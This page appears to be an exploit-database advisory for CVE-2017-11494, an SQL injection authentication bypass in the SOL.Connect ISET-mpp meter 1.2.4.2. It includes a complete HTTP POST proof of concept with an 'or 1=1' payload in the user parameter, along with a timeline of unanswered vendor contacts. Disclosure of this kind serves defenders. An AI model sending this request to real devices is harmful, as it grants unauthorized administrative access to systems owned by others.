header-logo
Suggest Exploit
vendor:
ISET-mpp meter
by:
Andy Tan
9,8
CVSS
CRITICAL
SQL injection
89
CWE
Product Name: ISET-mpp meter
Affected Version From: 1.2.4.2
Affected Version To: 1.2.4.2
Patch Exists: NO
Related CWE: CVE-2017-11494
CPE: a:sol.connect:iset-mpp_meter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

SQL injection leading to administrative access through authentication bypass

A vulnerability exists in SOL.Connect ISET-mpp meter 1.2.4.2 and possibly earlier versions, which allows an attacker to bypass authentication and gain administrative access. This is achieved by sending a specially crafted HTTP request with an SQL injection payload in the user parameter.

Mitigation:

The vendor should patch the vulnerability by properly sanitizing user input and preventing SQL injection attacks.
Source

Exploit-DB raw data:

Vulnerability type: 
SQL injection, leading to administrative access through authentication bypass.

-----------------------------------
Product: SOL.Connect ISET-mpp meter
-----------------------------------
Affected version: SOL.Connect ISET-mpp meter 1.2.4.2 and possibly earlier

Vulnerable parameter: user
------------------------
Credit: Andy Tan
------------------------
CVE ID: CVE-2017-11494
------------------------

================
Proof of Concept
================
HTTP Request:
POST /_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4a69e249c1d0ab977276
3f3c97e69_/%3fs%3dmain HTTP/1.1
Host: <IP-address>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://<IP-address>/_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4
a69e249c1d0ab9772763f3c97e69_/%3fs%3dmain
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

action=submit&origin=%2F_45b4a69e249c1d0ab9772763f3c97e69_%2F%3Fs%3Dmain
&s=login&user=admin%27+or+%271%27%3D%271+--%2B&password=asd

------------------------
Vendor contact timeline:
------------------------
2017-07-20: Contacted vendor. No response.
2017-07-26: Contacted vendor again. No response.
2017-08-01: Public disclosure.

Navigation

Suggest Exploit

Services By CQR